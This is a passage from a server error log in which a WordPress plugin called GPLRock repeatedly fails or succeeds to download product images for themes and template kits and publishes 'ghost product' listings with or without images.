tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:49 UTC] GPLRock: Image download failed for product tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tucson---sports-fitness-and-gym-responsive-woocommerce-wordpress-theme-26422.webp for product tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:23:51 UTC] GPLRock WARNING: Image download failed for product tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tucson---sports-fitness-and-gym-responsive-woocommerce-wordpress-theme-26422.webp [22-Mar-2026 14:23:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme [22-Mar-2026 14:23:51 UTC] GPLRock: Image download failed for product wam-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:53 UTC] GPLRock: Image download failed for product wam-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wam---creative-agency-wordpress-theme-26294.webp for product wam-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:23:56 UTC] GPLRock: Image download failed for product wam-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:58 UTC] GPLRock: Image download failed for product wam-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wam---creative-agency-wordpress-theme-26294.webp for product wam-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:00 UTC] GPLRock WARNING: Image download failed for product wam-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wam---creative-agency-wordpress-theme-26294.webp [22-Mar-2026 14:24:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wam-creative-agency-wordpress-theme [22-Mar-2026 14:24:00 UTC] GPLRock: Image download failed for product bazz-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:02 UTC] GPLRock: Image download failed for product bazz-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bazz---woocommerce-wordpress-theme-19243.webp for product bazz-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:05 UTC] GPLRock: Image download failed for product bazz-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:07 UTC] GPLRock: Image download failed for product bazz-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bazz---woocommerce-wordpress-theme-19243.webp for product bazz-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:09 UTC] GPLRock WARNING: Image download failed for product bazz-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bazz---woocommerce-wordpress-theme-19243.webp [22-Mar-2026 14:24:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bazz-woocommerce-wordpress-theme [22-Mar-2026 14:24:10 UTC] GPLRock: Image download failed for product geko-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:12 UTC] GPLRock: Image download failed for product geko-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/geko---startup-wordpress-theme-594.webp for product geko-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:14 UTC] GPLRock: Image download failed for product geko-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:16 UTC] GPLRock: Image download failed for product geko-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/geko---startup-wordpress-theme-594.webp for product geko-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:18 UTC] GPLRock WARNING: Image download failed for product geko-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/geko---startup-wordpress-theme-594.webp [22-Mar-2026 14:24:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: geko-startup-wordpress-theme [22-Mar-2026 14:24:19 UTC] GPLRock: Image download failed for product investment-business-financial-advisor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:21 UTC] GPLRock: Image download failed for product investment-business-financial-advisor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/investment---business--financial-advisor-wordpress-theme-24265.webp for product investment-business-financial-advisor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:23 UTC] GPLRock: Image download failed for product investment-business-financial-advisor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:25 UTC] GPLRock: Image download failed for product investment-business-financial-advisor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/investment---business--financial-advisor-wordpress-theme-24265.webp for product investment-business-financial-advisor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:27 UTC] GPLRock WARNING: Image download failed for product investment-business-financial-advisor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/investment---business--financial-advisor-wordpress-theme-24265.webp [22-Mar-2026 14:24:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: investment-business-financial-advisor-wordpress-theme [22-Mar-2026 14:24:28 UTC] GPLRock: Image download failed for product evana-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:30 UTC] GPLRock: Image download failed for product evana-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evana---responsive-woocommerce-theme-5946.webp for product evana-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:32 UTC] GPLRock: Image download failed for product evana-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:34 UTC] GPLRock: Image download failed for product evana-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evana---responsive-woocommerce-theme-5946.webp for product evana-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:36 UTC] GPLRock WARNING: Image download failed for product evana-responsive-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/evana---responsive-woocommerce-theme-5946.webp [22-Mar-2026 14:24:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evana-responsive-woocommerce-theme [22-Mar-2026 14:24:37 UTC] GPLRock: Image downloaded successfully for product polikal-political-candidate-party-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c338352.webp [22-Mar-2026 14:24:37 UTC] GPLRock: Using pre-downloaded image for product polikal-political-candidate-party-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c338352.webp [22-Mar-2026 14:24:37 UTC] GPLRock: Ghost product published with image - Product ID: polikal-political-candidate-party-wordpress-theme [22-Mar-2026 14:24:37 UTC] GPLRock: Image downloaded successfully for product chicky-wordpress-fashion-marketplace-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c360ac80.webp [22-Mar-2026 14:24:37 UTC] GPLRock: Using pre-downloaded image for product chicky-wordpress-fashion-marketplace-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c360ac80.webp [22-Mar-2026 14:24:37 UTC] GPLRock: Ghost product published with image - Product ID: chicky-wordpress-fashion-marketplace-theme [22-Mar-2026 14:24:37 UTC] GPLRock: Image download failed for product puregiven-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:39 UTC] GPLRock: Image download failed for product puregiven-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/puregiven---charity-wordpress-theme-4364.webp for product puregiven-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:41 UTC] GPLRock: Image download failed for product puregiven-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:44 UTC] GPLRock: Image download failed for product puregiven-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/puregiven---charity-wordpress-theme-4364.webp for product puregiven-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:46 UTC] GPLRock WARNING: Image download failed for product puregiven-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/puregiven---charity-wordpress-theme-4364.webp [22-Mar-2026 14:24:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: puregiven-charity-wordpress-theme [22-Mar-2026 14:24:46 UTC] GPLRock: Image download failed for product alesushi-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:48 UTC] GPLRock: Image download failed for product alesushi-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alesushi---restaurant-wordpress-theme-14844.webp for product alesushi-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:51 UTC] GPLRock: Image download failed for product alesushi-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:53 UTC] GPLRock: Image download failed for product alesushi-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:24:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alesushi---restaurant-wordpress-theme-14844.webp for product alesushi-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:24:55 UTC] GPLRock WARNING: Image download failed for product alesushi-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alesushi---restaurant-wordpress-theme-14844.webp [22-Mar-2026 14:24:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alesushi-restaurant-wordpress-theme [22-Mar-2026 18:16:36 UTC] GPLRock: Image downloaded successfully for product creativic-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-874ca17e.jpg [22-Mar-2026 18:16:36 UTC] GPLRock: Using pre-downloaded image for product creativic-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-874ca17e.jpg [22-Mar-2026 18:16:36 UTC] GPLRock: Ghost product published with image - Product ID: creativic-creative-agency-elementor-template-kit [22-Mar-2026 18:16:37 UTC] GPLRock: Image downloaded successfully for product creativa-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3600ae91.webp [22-Mar-2026 18:16:37 UTC] GPLRock: Using pre-downloaded image for product creativa-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3600ae91.webp [22-Mar-2026 18:16:37 UTC] GPLRock: Ghost product published with image - Product ID: creativa-creative-agency-elementor-template-kit [22-Mar-2026 18:16:38 UTC] GPLRock: Image downloaded successfully for product creatifull-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e2232bf.webp [22-Mar-2026 18:16:38 UTC] GPLRock: Using pre-downloaded image for product creatifull-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e2232bf.webp [22-Mar-2026 18:16:38 UTC] GPLRock: Ghost product published with image - Product ID: creatifull-creative-agency-elementor-template-kit [22-Mar-2026 18:16:39 UTC] GPLRock: Image downloaded successfully for product craftmaya-it-solutions-services-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c86eed1b.webp [22-Mar-2026 18:16:39 UTC] GPLRock: Using pre-downloaded image for product craftmaya-it-solutions-services-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c86eed1b.webp [22-Mar-2026 18:16:39 UTC] GPLRock: Ghost product published with image - Product ID: craftmaya-it-solutions-services-company-elementor-template-kit [22-Mar-2026 18:16:41 UTC] GPLRock: Image downloaded successfully for product craftis-handcraft-artisan-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60ccfd40.webp [22-Mar-2026 18:16:41 UTC] GPLRock: Using pre-downloaded image for product craftis-handcraft-artisan-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60ccfd40.webp [22-Mar-2026 18:16:41 UTC] GPLRock: Ghost product published with image - Product ID: craftis-handcraft-artisan-elementor-template-kit [22-Mar-2026 18:16:42 UTC] GPLRock: Image downloaded successfully for product coworking-creative-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5b0f1277.webp [22-Mar-2026 18:16:42 UTC] GPLRock: Using pre-downloaded image for product coworking-creative-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5b0f1277.webp [22-Mar-2026 18:16:42 UTC] GPLRock: Ghost product published with image - Product ID: coworking-creative-space-elementor-template-kit [22-Mar-2026 18:16:43 UTC] GPLRock: Image downloaded successfully for product cowo-coworking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9b3f494.webp [22-Mar-2026 18:16:44 UTC] GPLRock: Using pre-downloaded image for product cowo-coworking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9b3f494.webp [22-Mar-2026 18:16:44 UTC] GPLRock: Ghost product published with image - Product ID: cowo-coworking-elementor-template-kit [22-Mar-2026 18:16:45 UTC] GPLRock: Image downloaded successfully for product covoza-covid-19-awareness-prevention-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b068c440.jpg [22-Mar-2026 18:16:46 UTC] GPLRock: Using pre-downloaded image for product covoza-covid-19-awareness-prevention-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b068c440.jpg [22-Mar-2026 18:16:46 UTC] GPLRock: Ghost product published with image - Product ID: covoza-covid-19-awareness-prevention-elementor-template-kit [22-Mar-2026 18:16:47 UTC] GPLRock: Image downloaded successfully for product courso-online-university-courses-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5985b526.webp [22-Mar-2026 18:16:47 UTC] GPLRock: Using pre-downloaded image for product courso-online-university-courses-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5985b526.webp [22-Mar-2026 18:16:47 UTC] GPLRock: Ghost product published with image - Product ID: courso-online-university-courses-elementor-template-kit [22-Mar-2026 18:16:48 UTC] GPLRock: Image downloaded successfully for product coursekit-online-e-learning-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da9a1e55.webp [22-Mar-2026 18:16:48 UTC] GPLRock: Using pre-downloaded image for product coursekit-online-e-learning-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da9a1e55.webp [22-Mar-2026 18:16:48 UTC] GPLRock: Ghost product published with image - Product ID: coursekit-online-e-learning-elementor-template-kit [22-Mar-2026 18:18:11 UTC] GPLRock: Image downloaded successfully for product css-igniter-coastline-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c18c020a.jpg [22-Mar-2026 18:18:11 UTC] GPLRock: Using pre-downloaded image for product css-igniter-coastline-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c18c020a.jpg [22-Mar-2026 18:18:11 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-coastline-wordpress-theme [22-Mar-2026 18:18:12 UTC] GPLRock: Image downloaded successfully for product studiopress-agency-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78e95a89.jpg [22-Mar-2026 18:18:14 UTC] GPLRock: Using pre-downloaded image for product studiopress-agency-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78e95a89.jpg [22-Mar-2026 18:18:14 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-agency-pro-genesis-wordpress-theme [22-Mar-2026 18:18:15 UTC] GPLRock: Image downloaded successfully for product woocommerce-constantcontact-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f52e9884.jpg [22-Mar-2026 18:18:15 UTC] GPLRock: Using pre-downloaded image for product woocommerce-constantcontact-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f52e9884.jpg [22-Mar-2026 18:18:15 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-constantcontact-integration [22-Mar-2026 18:18:16 UTC] GPLRock: Image downloaded successfully for product ninja-kick-contact-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d72b1fff.jpg [22-Mar-2026 18:18:18 UTC] GPLRock: Using pre-downloaded image for product ninja-kick-contact-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d72b1fff.jpg [22-Mar-2026 18:18:18 UTC] GPLRock: Ghost product published with image - Product ID: ninja-kick-contact-form [22-Mar-2026 18:18:19 UTC] GPLRock: Image downloaded successfully for product learndash-lms-samcart-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea7be870.jpg [22-Mar-2026 18:18:19 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-samcart-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea7be870.jpg [22-Mar-2026 18:18:19 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-samcart-integration [22-Mar-2026 18:18:20 UTC] GPLRock: Image downloaded successfully for product elmastudio-dorayaki-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54cec5db.jpg [22-Mar-2026 18:18:21 UTC] GPLRock: Using pre-downloaded image for product elmastudio-dorayaki-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54cec5db.jpg [22-Mar-2026 18:18:21 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-dorayaki-wordpress-theme [23-Mar-2026 01:14:53 UTC] GPLRock: Image download failed for product appbox-app-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:14:55 UTC] GPLRock: Image download failed for product appbox-app-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:14:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appbox---app-store-wordpress-theme-2440.webp for product appbox-app-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:14:58 UTC] GPLRock: Image download failed for product appbox-app-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:00 UTC] GPLRock: Image download failed for product appbox-app-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appbox---app-store-wordpress-theme-2440.webp for product appbox-app-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:02 UTC] GPLRock WARNING: Image download failed for product appbox-app-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/appbox---app-store-wordpress-theme-2440.webp [23-Mar-2026 01:15:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appbox-app-store-wordpress-theme [23-Mar-2026 01:15:02 UTC] GPLRock: Image download failed for product renata-wordpress-theme-for-spa-wellness (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:04 UTC] GPLRock: Image download failed for product renata-wordpress-theme-for-spa-wellness (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renata---wordpress-theme-for-spa--wellness-32943.webp for product renata-wordpress-theme-for-spa-wellness after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:06 UTC] GPLRock: Image download failed for product renata-wordpress-theme-for-spa-wellness (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:08 UTC] GPLRock: Image download failed for product renata-wordpress-theme-for-spa-wellness (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renata---wordpress-theme-for-spa--wellness-32943.webp for product renata-wordpress-theme-for-spa-wellness after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:11 UTC] GPLRock WARNING: Image download failed for product renata-wordpress-theme-for-spa-wellness. URL: https://meldwp.com/wp-content/uploads/renata---wordpress-theme-for-spa--wellness-32943.webp [23-Mar-2026 01:15:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: renata-wordpress-theme-for-spa-wellness [23-Mar-2026 01:15:11 UTC] GPLRock: Image download failed for product splendour-jewelry-watches-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:13 UTC] GPLRock: Image download failed for product splendour-jewelry-watches-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/splendour---jewelry--watches-wordpress-theme-12389.webp for product splendour-jewelry-watches-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:15 UTC] GPLRock: Image download failed for product splendour-jewelry-watches-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:17 UTC] GPLRock: Image download failed for product splendour-jewelry-watches-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/splendour---jewelry--watches-wordpress-theme-12389.webp for product splendour-jewelry-watches-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:19 UTC] GPLRock WARNING: Image download failed for product splendour-jewelry-watches-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/splendour---jewelry--watches-wordpress-theme-12389.webp [23-Mar-2026 01:15:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: splendour-jewelry-watches-wordpress-theme [23-Mar-2026 01:15:19 UTC] GPLRock: Image download failed for product spirits-liquor-shop-wine-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:21 UTC] GPLRock: Image download failed for product spirits-liquor-shop-wine-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spirits---liquor-shop--wine-store-wordpress-theme-25147.webp for product spirits-liquor-shop-wine-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:24 UTC] GPLRock: Image download failed for product spirits-liquor-shop-wine-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:26 UTC] GPLRock: Image download failed for product spirits-liquor-shop-wine-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spirits---liquor-shop--wine-store-wordpress-theme-25147.webp for product spirits-liquor-shop-wine-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:28 UTC] GPLRock WARNING: Image download failed for product spirits-liquor-shop-wine-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/spirits---liquor-shop--wine-store-wordpress-theme-25147.webp [23-Mar-2026 01:15:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spirits-liquor-shop-wine-store-wordpress-theme [23-Mar-2026 01:15:28 UTC] GPLRock: Image download failed for product cabin-beautiful-vintage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:30 UTC] GPLRock: Image download failed for product cabin-beautiful-vintage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cabin---beautiful-vintage-wordpress-theme-14568.webp for product cabin-beautiful-vintage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:33 UTC] GPLRock: Image download failed for product cabin-beautiful-vintage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:35 UTC] GPLRock: Image download failed for product cabin-beautiful-vintage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cabin---beautiful-vintage-wordpress-theme-14568.webp for product cabin-beautiful-vintage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:37 UTC] GPLRock WARNING: Image download failed for product cabin-beautiful-vintage-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cabin---beautiful-vintage-wordpress-theme-14568.webp [23-Mar-2026 01:15:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cabin-beautiful-vintage-wordpress-theme [23-Mar-2026 01:15:37 UTC] GPLRock: Image download failed for product cleaning-company-maid-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:39 UTC] GPLRock: Image download failed for product cleaning-company-maid-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cleaning-company---maid-service-wordpress-theme-20235.webp for product cleaning-company-maid-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:41 UTC] GPLRock: Image download failed for product cleaning-company-maid-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:43 UTC] GPLRock: Image download failed for product cleaning-company-maid-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cleaning-company---maid-service-wordpress-theme-20235.webp for product cleaning-company-maid-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [23-Mar-2026 01:15:45 UTC] GPLRock WARNING: Image download failed for product cleaning-company-maid-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cleaning-company---maid-service-wordpress-theme-20235.webp [23-Mar-2026 01:15:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cleaning-company-maid-service-wordpress-theme [23-Mar-2026 01:15:46 UTC] GPLRock: Image download failed for product 